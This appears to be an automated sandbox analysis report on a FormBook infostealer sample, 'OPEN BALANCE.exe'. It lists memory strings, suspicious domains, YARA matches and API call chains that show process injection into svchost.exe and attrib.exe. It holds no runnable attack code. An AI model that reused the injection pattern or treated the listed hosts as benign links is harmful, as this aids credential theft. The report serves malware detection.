Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php?page=latest
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php?page=most-read
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php?page=terms
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: attrib.exe, 00000005.00000002.3918152730.000000000291E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: attrib.exe, 00000005.00000002.3918152730.0000000002947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: attrib.exe, 00000005.00000002.3918152730.000000000291E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: attrib.exe, 00000005.00000002.3918152730.000000000291E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: attrib.exe, 00000005.00000002.3918152730.000000000291E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: attrib.exe, 00000005.00000002.3918152730.000000000291E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: attrib.exe, 00000005.00000003.2772231893.000000000792B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: attrib.exe, 00000005.00000002.3919772809.0000000004280000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.0000000003310000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.by3393.com:35522/register?i_code=2867599
Source: attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919772809.00000000040EE000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.000000000317E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: attrib.exe, 00000005.00000002.3919772809.0000000003AA6000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.0000000002B36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,

0_2_008BEAFF

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_008BED6A

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

0_2_008BEAFF

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_008AAA57

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008D9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_008D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: OPEN BALANCE.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: OPEN BALANCE.exe, 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_29d33830-8
Source: OPEN BALANCE.exe, 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c3f9ac22-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: OPEN BALANCE.exe

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00843170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00843170
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008DA2D7 NtdllDialogWndProc_W,	0_2_008DA2D7
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D87B2 NtdllDialogWndProc_W,CallWindowProcW,	0_2_008D87B2
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D8AAA NtdllDialogWndProc_W,	0_2_008D8AAA
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00858BA4 NtdllDialogWndProc_W,	0_2_00858BA4
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D8B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_008D8B02
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D8D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,	0_2_008D8D0E
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D8FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_008D8FC9
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008590A7 NtdllDialogWndProc_W,	0_2_008590A7
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D90A1 SendMessageW,NtdllDialogWndProc_W,	0_2_008D90A1
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00859052 NtdllDialogWndProc_W,	0_2_00859052
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_008D911E
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9380 NtdllDialogWndProc_W,	0_2_008D9380
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D93CB NtdllDialogWndProc_W,	0_2_008D93CB
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9400 ClientToScreen,NtdllDialogWndProc_W,	0_2_008D9400
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D953A GetWindowLongW,NtdllDialogWndProc_W,	0_2_008D953A
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_008D9576
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008597C0 GetParent,NtdllDialogWndProc_W,	0_2_008597C0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0085997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,	0_2_0085997D
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	0_2_008D9EF3
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9E74 NtdllDialogWndProc_W,	0_2_008D9E74
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D9F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_008D9F86
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042BB03 NtClose,	2_2_0042BB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk,	2_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74340 NtSetContextThread,	2_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74650 NtSuspendThread,	2_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BA0 NtEnumerateValueKey,	2_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B80 NtQueryInformationFile,	2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BE0 NtQueryValueKey,	2_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BF0 NtAllocateVirtualMemory,	2_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AB0 NtWaitForSingleObject,	2_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AF0 NtWriteFile,	2_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AD0 NtReadFile,	2_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FA0 NtQuerySection,	2_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FB0 NtResumeThread,	2_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F90 NtProtectVirtualMemory,	2_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FE0 NtCreateFile,	2_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F30 NtCreateSection,	2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F60 NtCreateProcessEx,	2_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken,	2_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E80 NtReadVirtualMemory,	2_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EE0 NtQueueApcThread,	2_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E30 NtWriteVirtualMemory,	2_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DB0 NtEnumerateKey,	2_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DD0 NtDelayExecution,	2_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D30 NtUnmapViewOfSection,	2_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D00 NtSetInformationFile,	2_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D10 NtMapViewOfSection,	2_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CA0 NtQueryInformationToken,	2_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CF0 NtOpenProcess,	2_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CC0 NtQueryVirtualMemory,	2_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C00 NtQueryInformationProcess,	2_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C60 NtCreateKey,	2_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73090 NtSetValueKey,	2_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73010 NtOpenDirectoryObject,	2_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A739B0 NtGetContextThread,	2_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D10 NtOpenProcessToken,	2_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D70 NtOpenThread,	2_2_03A73D70
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F74340 NtSetContextThread,LdrInitializeThunk,	5_2_02F74340
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F74650 NtSuspendThread,LdrInitializeThunk,	5_2_02F74650
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72AF0 NtWriteFile,LdrInitializeThunk,	5_2_02F72AF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72AD0 NtReadFile,LdrInitializeThunk,	5_2_02F72AD0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72B60 NtClose,LdrInitializeThunk,	5_2_02F72B60
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_02F72EE0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72FE0 NtCreateFile,LdrInitializeThunk,	5_2_02F72FE0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72FB0 NtResumeThread,LdrInitializeThunk,	5_2_02F72FB0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72F30 NtCreateSection,LdrInitializeThunk,	5_2_02F72F30
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_02F72CA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02F72C70
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72C60 NtCreateKey,LdrInitializeThunk,	5_2_02F72C60
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02F72DF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72DD0 NtDelayExecution,LdrInitializeThunk,	5_2_02F72DD0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_02F72D30
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_02F72D10
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F735C0 NtCreateMutant,LdrInitializeThunk,	5_2_02F735C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F739B0 NtGetContextThread,LdrInitializeThunk,	5_2_02F739B0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72AB0 NtWaitForSingleObject,	5_2_02F72AB0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72BF0 NtAllocateVirtualMemory,	5_2_02F72BF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72BE0 NtQueryValueKey,	5_2_02F72BE0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72BA0 NtEnumerateValueKey,	5_2_02F72BA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72B80 NtQueryInformationFile,	5_2_02F72B80
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72EA0 NtAdjustPrivilegesToken,	5_2_02F72EA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72E80 NtReadVirtualMemory,	5_2_02F72E80
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72E30 NtWriteVirtualMemory,	5_2_02F72E30
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72FA0 NtQuerySection,	5_2_02F72FA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72F90 NtProtectVirtualMemory,	5_2_02F72F90
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72F60 NtCreateProcessEx,	5_2_02F72F60
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72CF0 NtOpenProcess,	5_2_02F72CF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72CC0 NtQueryVirtualMemory,	5_2_02F72CC0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72C00 NtQueryInformationProcess,	5_2_02F72C00
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72DB0 NtEnumerateKey,	5_2_02F72DB0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F72D00 NtSetInformationFile,	5_2_02F72D00
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F73090 NtSetValueKey,	5_2_02F73090
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F73010 NtOpenDirectoryObject,	5_2_02F73010
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F73D70 NtOpenThread,	5_2_02F73D70
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F73D10 NtOpenProcessToken,	5_2_02F73D10
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_025782F0 NtCreateFile,	5_2_025782F0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02578450 NtReadFile,	5_2_02578450
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02578540 NtDeleteFile,	5_2_02578540
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_025785E0 NtClose,	5_2_025785E0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDF934 NtUnmapViewOfSection,NtClose,	5_2_02DDF934
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDFAB6 NtResumeThread,	5_2_02DDFAB6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDF998 NtResumeThread,	5_2_02DDF998

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_008AD5EB

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74695590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_008A1201

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_008AE8F6

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B2046	0_2_008B2046
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00848060	0_2_00848060
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008A8298	0_2_008A8298
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0087E4FF	0_2_0087E4FF
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0087676B	0_2_0087676B
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D4873	0_2_008D4873
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0086CAA0	0_2_0086CAA0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0084CAF0	0_2_0084CAF0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0085CC39	0_2_0085CC39
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00876DD9	0_2_00876DD9
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008491C0	0_2_008491C0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0085B119	0_2_0085B119
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00861394	0_2_00861394
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00861706	0_2_00861706
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0086781B	0_2_0086781B
